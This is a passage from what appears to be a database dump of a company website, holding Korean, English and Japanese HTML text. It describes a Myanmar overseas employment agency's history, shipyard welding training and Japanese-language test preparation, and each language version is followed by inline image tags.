Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 193, 'en', 0, '<p>&nbsp;<span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\" data-align=\"center\">', '', 'full_html'),
('page', 0, 23, 193, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', 